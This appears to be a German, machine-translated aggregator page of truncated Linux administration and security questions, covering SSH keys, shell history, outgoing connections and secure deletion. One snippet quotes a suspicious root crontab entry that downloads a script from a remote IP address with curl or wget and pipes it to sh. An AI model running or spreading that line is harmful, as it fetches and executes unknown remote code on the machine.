Inhalte im Zusammenhang mit der Computersicherheit, dh Inhalte zu Richtlinien, Mechanismen usw., stellen sicher, dass keine Daten verloren gehen oder beschädigt werden und Dienste unter allen Umständen verfügbar sind.
Laut einem Artikel von rapid7 gibt es einige anfällige Samba- Versionen, die eine Remote-Codeausführung auf Linux-Systemen ermöglichen: Während der WannaCry- Lösegeldwurm Windows-Systeme angegriffen hat und leicht zu identifizieren war, wirkt sich die Samba- Sicherheitsanfälligkeit mit eindeutigen Korrekturmaßnahmen auf Linux- und Unix-Systeme aus und kann erhebliche technische Hindernisse für den Erhalt …
Ich soll auf einen Server zugreifen, um die Staging- und Live-Server eines Unternehmens in unsere Bereitstellungsschleife einzubinden. Ein Administrator auf seiner Seite hat die beiden Instanzen eingerichtet und dann einen Benutzer auf dem Server für uns als SSH angelegt. So viel bin ich gewohnt. In Gedanken würde ich ihnen jetzt …
Mein Computer ist ein Server, daher möchte ich Verbindungen zu meinem Server ignorieren (z. B. wenn jemand meine Website besucht). Ich möchte nur Verbindungen / Anfragen von meinem Server zu anderen Orten sehen. Wie sehe ich nur diese ausgehenden Verbindungen? EDIT: Ich bin neu in diese Art von Dingen. Ich …
Vor einiger Zeit ist mir aufgefallen, dass Benutzernamen und Kennwörter, die curlals Befehlszeilenargumente angegeben wurden, nicht in der psAusgabe erscheinen (obwohl sie natürlich in Ihrem Bash-Verlauf erscheinen können). Sie erscheinen ebenfalls nicht in /proc/PID/cmdline. (Die Länge des kombinierten Benutzernamen / Passwort-Arguments kann jedoch abgeleitet werden.) Demonstration unten: [root@localhost ~]# nc …
Wir haben ein kleines Problem auf einem Server. Wir möchten, dass einige Benutzer z. B. sudoroot werden können, jedoch mit der Einschränkung, dass der Benutzer das root-Passwort nicht ändern kann. Dies ist eine Garantie dafür, dass wir uns weiterhin bei diesem Server anmelden und root werden können, unabhängig davon, was …
Gibt es eine Möglichkeit, zu verhindern, dass ein Befehl zu Ihrem Verlauf hinzugefügt wird? Ich habe einen Befehl, den ich aus meiner Verlaufsdatei entfernen möchte, und es ist mir wirklich egal, wenn ich den im Speicher abgelegten Verlauf durchsuche, obwohl das weniger bedenklich ist. Gibt es eine Möglichkeit, dies zu …
Derzeit arbeite ich remote für eine Reihe von Organisationen, bei denen ich regelmäßig auf ihre Server zugreifen muss, um Wartungen und Upgrades durchzuführen. Ist es für mich sicher, meinen öffentlichen RSA-SSH-Schlüssel zur .ssh/authorized_keysDatei hinzuzufügen , damit ich mich viel schneller anmelden kann, ohne nach Passwörtern suchen zu müssen? Ich gehe …
Ich versuche, einige Ordner (wie z. B. /varund /home) nach dem Lesen dieses Handbuchs auf eine separate Partition zu verschieben: 3.2.1 Wählen Sie ein intelligentes Partitionsschema Nach dieser Anleitung konnte ich einen Ordner erfolgreich verschieben . Es scheint jedoch nicht für mehrere Ordner zu funktionieren, und alle meine Ordner werden …
Ich wollte etwas zu meiner Root-Crontab-Datei auf meinem Raspberry Pi hinzufügen und habe einen Eintrag gefunden, der mir verdächtig erscheint. Bei der Suche nach Teilen davon bei Google ist nichts aufgetaucht. Crontab-Eintrag: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Die Inhalte von …
Ich verwende Chromium wie folgt: chromium --no-sandbox Ich mache das, weil ich Debian Squeeze auf einem OpenVZ-VM-Container ausführe und nur so kann ich es zum Laufen bringen. Obwohl ich immer wieder lese, ist das schrecklich . Aber ich möchte genau wissen warum. Kann mir das bitte jemand erklären? Muss sich …
Das ist mehr müßige Neugier als alles andere. Ein Freund von mir fragte mich: "Welchen Portbereich kann nur root unter Linux verwenden?" Ich sagte ihm, 0-1024 seien eingeschränkt. Dann fragte er mich, warum es so sei und ... ich war ratlos. Keine Ahnung. Gibt es einen Grund, warum diese Ports …
Meine .muttrc Datei sieht so etwas wie diese eine oder unter einem Blick sehen. Ich zögere mit dem Passwort. Wie soll ich mein Passwort speichern, um es zu verwenden mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" …
Ich habe einen privaten .pemSchlüssel von AWS generiert und heruntergeladen . Um Putty zum Herstellen einer Verbindung mit der virtuellen Maschine zu verwenden, muss dieser Schlüssel im .ppkFormat vorliegen. Der Konvertierungsprozess wird hier in ungefähr 20 Zeilen beschrieben: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Ich benutze Linux Mint (eine Ubuntu-Distribution) und ich weiß, dass ich …
Ich habe einen Prozess, der auf 2 Häfen hört: 45136 / tcp und 37208 / udp (wirklich nehme ich an, dass es der gleiche Prozess ist). Aber netstat gibt keine pid zurück: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Gleiches Ergebnis mit "grep 37208". Ich …
Ich habe einen Verzeichnisbaum, den ich mit dem Linux-Dienstprogramm 'shred' vernichten möchte. Leider hat shred keine -RMöglichkeit zum rekursiven Shreddern. Wie kann ich einen gesamten Verzeichnisbaum rekursiv zerreißen?
We use cookies and other tracking technologies to improve your browsing experience on our website,
to show you personalized content and targeted ads, to analyze our website traffic,
and to understand where our visitors are coming from.
By continuing, you consent to our use of cookies and other tracking technologies and
affirm you're at least 16 years old or have consent from a parent or guardian.